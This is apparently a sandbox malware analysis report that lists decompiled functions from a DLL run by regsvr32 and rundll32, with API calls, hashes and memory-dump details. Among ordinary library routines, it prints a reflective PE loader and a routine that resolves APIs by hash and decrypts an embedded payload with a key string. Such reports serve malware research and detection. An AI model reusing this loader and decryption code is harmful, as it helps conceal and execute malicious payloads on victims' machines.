Instruction Fuzzy Hash: AD01F972A00018AFEF08DB74CD45DEE73B8DF46740F4102AAE906D3544EA70AB848662

Uniqueness

Uniqueness Score: -1.00%

Function 10002670, Relevance: 5.2, APIs: 4, Instructions: 181
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10002670(intOrPtr __ecx, intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t133;
				intOrPtr _t138;
				void* _t202;
				void* _t203;

				_v44 = __ecx;
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t114 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c))))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *((intOrPtr*)(_a4 + 0x28)));
						_t203 = _t202 + 8;
						_v36 = _t114;
						if(_v36 != 0) {
							_t116 = E10001F00( *((intOrPtr*)(_a4 + 8)), 4 +  *(_a4 + 0xc) * 4);
							_t202 = _t203 + 8;
							_v28 = _t116;
							if(_v28 != 0) {
								 *((intOrPtr*)(_a4 + 8)) = _v28;
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) +  *(_a4 + 0xc) * 4)) = _v36;
								 *(_a4 + 0xc) =  *(_a4 + 0xc) + 1;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while( *_v32 != 0) {
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t133 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36, _v40 + 2,  *((intOrPtr*)(_a4 + 0x28)));
										_t202 = _t202 + 0xc;
										 *_v24 = _t133;
									} else {
										_t138 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36,  *_v32 & 0x0000ffff,  *((intOrPtr*)(_a4 + 0x28)));
										_t202 = _t202 + 0xc;
										 *_v24 = _t138;
									}
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_v24 = _v24 + 4;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								if(_v16 != 0) {
									_v8 = _v8 + 0x14;
									continue;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
								SetLastError(0x7f);
								break;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}

0x10002676
0x1000267f
0x10002682
0x10002693
0x1000269d
0x100026b1
0x100026bf
0x100026f7
0x100026f9
0x100026fc
0x10002703
0x1000272e
0x10002733
0x10002736
0x1000273d
0x1000276f
0x10002781
0x10002790
0x10002799
0x100027bd
0x100027c9
0x1000279b
0x100027a3
0x100027af
0x100027af
0x100027e0
0x100027f3
0x10002825
0x10002840
0x10002842
0x10002848
0x100027f5
0x10002811
0x10002813
0x10002819
0x10002819
0x10002850
0x100027d4
0x100027dd
0x00000000
0x10002852
0x10002852
0x00000000
0x10002852
0x10002850
0x10002864
0x100026bc
0x00000000
0x100026bc
0x10002877
0x1000287e
0x00000000
0x1000287e
0x10002750
0x10002757
0x1000275d
0x00000000
0x1000275d
0x10002707
0x1000270d
0x00000000
0x1000270d
0x00000000
0x1000288b
0x00000000

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,10002C4E,00000000,00000000), ref: 100026C5
SetLastError.KERNEL32(0000007E), ref: 10002707

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
Instruction ID: 5b18a635dcf056017fd1ee77a603d3a0bb8baed770e763f1765233b10108ec1d
Opcode Fuzzy Hash: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
Instruction Fuzzy Hash: 7381BAB4A05209DFDB04CF94C880A9EB7B1FF88354F248159E819AB355D735EE82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001431B, Relevance: 5.0, APIs: 4, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E1001431B(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E1000A0DB(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x1005aac0 == 0) {
					_t4 = E100142F7();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x1005ac78 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x1005ac60);
					if( *_t15 == 0) {
						_t4 = 0x1005aac8 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x1005ac60);
				}
				EnterCriticalSection(0x1005aac8 + _t11 * 0x18);
				return _t4;
			}

0x1001431b
0x1001431b
0x1001431b
0x1001431c
0x10014320
0x10014323
0x10014325
0x10014325
0x10014331
0x10014333
0x10014333
0x10014338
0x1001433f
0x10014340
0x10014341
0x10014350
0x10014357
0x1001435c
0x10014363
0x10014366
0x1001436c
0x1001436c
0x10014373
0x10014373
0x1001437f
0x10014385

APIs

EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
Instruction ID: b2ae72b8ab0fae698251e24a42d2174316ff56aad592cf34d272a36c1b8e20b9
Opcode Fuzzy Hash: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
Instruction Fuzzy Hash: 05F090739002169BE700DF59CC89A1ABBA9FBC32A5F93011AF14096121DB3199C5CA61

Uniqueness

Uniqueness Score: -1.00%

Function 1001398E, Relevance: 5.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001398E(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x1005aaa8
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

0x10013990
0x10013993
0x10013993
0x10013997
0x1001399d
0x100139a3
0x100139cc
0x100139cd
0x00000000
0x100139d3
0x100139a5
0x100139a8
0x00000000
0x00000000
0x100139ac
0x100139b4
0x00000000
0x100139bb
0x100139c2
0x00000000
0x100139c8

APIs

EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013997
TlsGetValue.KERNEL32(1005AA8C,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139AC
LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139C2
LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139CD

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
Instruction ID: ae8276b6876f5357c50f650584214137971e28de593e3cdb7c29343fae997712
Opcode Fuzzy Hash: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
Instruction Fuzzy Hash: 27F012762006529FD710DF65CC8C90B77EDEF84291327D856E84697152D770F856CF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 5104 Parent PID: 5792 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	13.5%
Signature Coverage:	0%
Total number of Nodes:	356
Total number of Limit Nodes:	25

Executed Functions

Function 10002900, Relevance: 22.8, APIs: 15, Instructions: 331
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10002900(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001FE0(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0x47e81005
						if(E10001FE0(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0x47e81005
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _v64 - 0x00000001 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001FE0(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001E60(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0x47e81005
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E10002010(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10002500(_v100, _v72, _v76);
															}
															if(E10002670(_v100, _v72) != 0) {
																_t202 = E10002300(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10002480(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_t209 =  *0x10058ed8; // 0x0
																		_t278 =  *0x10058ed4; // 0x1
																		_t326 =  *0x10058ed0; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002EC0(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}

APIs

Part of subcall function 10001FE0: SetLastError.KERNEL32(0000000D,?,?,10002925,10008AC6,00000040), ref: 10001FF1

SetLastError.KERNEL32(000000C1,10008AC6,00000040), ref: 10002948

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
Instruction ID: 2ef2df373ea658209f5af2a718a6df98ca9e1c1927523c70ceffa034f4820264
Opcode Fuzzy Hash: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
Instruction Fuzzy Hash: 01E1F874A01219EFEB04CF94C994E9EB7B2FF88384F208559E905AB399D770AD46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100088E0, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 131
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E100088E0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HWND__* _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct HWND__* _v28;
				struct HWND__* _v32;
				long _v36;
				int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebp;
				void* _t38;
				long _t45;
				long _t47;
				intOrPtr _t56;
				void* _t63;
				intOrPtr _t68;

				_t79 = __esi;
				_t78 = __edi;
				_t64 = __ebx;
				_v56 = _a8;
				 *0x10058ed0 = _a4;
				_t72 = _a8;
				 *0x10058ed4 = _a8;
				 *0x10058ed8 = _a12;
				_v8 = 0;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v12 = 0;
				_t38 = E10008860(__eflags); // executed
				if(_t38 != 0) {
					_push(0x10029b4c);
					E1001771B(__ebx, _t72, __edi, __esi, __eflags);
					return 0;
				}
				 *0x10056f08 = 0;
				 *0x10056f0c = 0;
				 *0x10056f10 = 0;
				 *0x10056f18 = 0;
				 *0x10056f14 = 0;
				_v40 = 0x44368d;
				_v52 = 0x3f8fc5;
				_v20 = 0x3b272b;
				_v24 = 0x2feb60;
				_v44 = 0xdd3c;
				_v48 = 0x47c;
				_v36 = 0x24e00;
				_v28 = E10006170(L"kernel32.dll");
				_v32 = E10006170(L"ntdll.dll");
				 *0x10058eb0 = E10006D50(_v28, 0x70e66e6b);
				 *0x10058eb8 = E10006D50(_v28, 0x579606ae);
				_t95 =  *0x10058eb8;
				if( *0x10058eb8 == 0) {
					_t45 = E10017716(0x10029b18);
					_t47 = E10017716("8192") | 0x00001000;
					__eflags = _t47;
					_v12 = VirtualAlloc(0, _v36, _t47, _t45);
				} else {
					_t63 =  *0x10058eb8(0xffffffff, 0, _v36, E10017716("8192") | 0x00001000, E10017716(0x10029b18), 0); // executed
					_v12 = _t63;
				}
				E10016A10(_t64, _t78, _t79, _v12, 0x10032098, _v36);
				_t68 =  *0x10056f04; // 0x730f
				_v16 = E1001703B(_t64, _v36, _t78, _t79, _t68);
				E10002FA0(_t95, _v16, "vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp", 0x6c);
				E10004F00(_v16, _v12, _v36);
				_t56 = E10002D20(0x10058ebc, _v12, _v36); // executed
				 *0x10058edc = _t56;
				ShowWindow(0, _v40);
				return 1;
			}

APIs

Part of subcall function 10008860: _malloc.LIBCMT ref: 1000886B

_printf.LIBCMT ref: 1000896B
VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00024E00,00000000,00000000,00000000), ref: 10008A2B
VirtualAlloc.KERNEL32(00000000,00024E00,00000000,00000000), ref: 10008A5D
_malloc.LIBCMT ref: 10008A82
ShowWindow.USER32(00000000,0044368D,00000000,00024E00), ref: 10008AD1

Strings

ntdll.dll, xrefs: 100089BB
kernel32.dll, xrefs: 100089AB
+';, xrefs: 10008988
8192, xrefs: 10008A10, 10008A44
`/, xrefs: 1000898F
vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp, xrefs: 10008A8F

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual_malloc$NumaShowWindow_printf
String ID: +';$8192$`/$kernel32.dll$ntdll.dll$vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp
API String ID: 1487653210-3670691644
Opcode ID: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
Instruction ID: 74e036033439e47f0f6271ee42a165f027743cdfe4c2c4d01037afcb8f86e406
Opcode Fuzzy Hash: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
Instruction Fuzzy Hash: FE5141F5D00214AFEB00CF90EC96BAE77B4FB48344F144528E909BB345E775A6448BA2

Uniqueness

Uniqueness Score: -1.00%

Function 10013A9B, Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E10013A9B() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x1005aaa8
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x6b0d50
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E100134F9(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E100134F9(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E100174D0(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x6b0d50
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x10057168;
							E10017C83( &_v28, 0x1002e258);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v36 = 0x10057200;
							E10017C83( &_v36, 0x1002e2b8);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v44 = 0x10057298;
							E10017C83( &_v44, 0x1002e2fc);
							asm("int3");
							_push(4);
							E10017BC1(E10027DEC, _t69, _t82, _t86);
							_t78 = E10013965(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1000CF71(_t78);
							}
							return E10017C60(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x6b0d50
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x6b0d50
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x6b0d50
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}

APIs

EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013AAA
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013B00
GlobalHandle.KERNEL32 ref: 10013B09
GlobalUnlock.KERNEL32(00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B12
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 10013B29
GlobalHandle.KERNEL32 ref: 10013B3B
GlobalLock.KERNEL32 ref: 10013B42
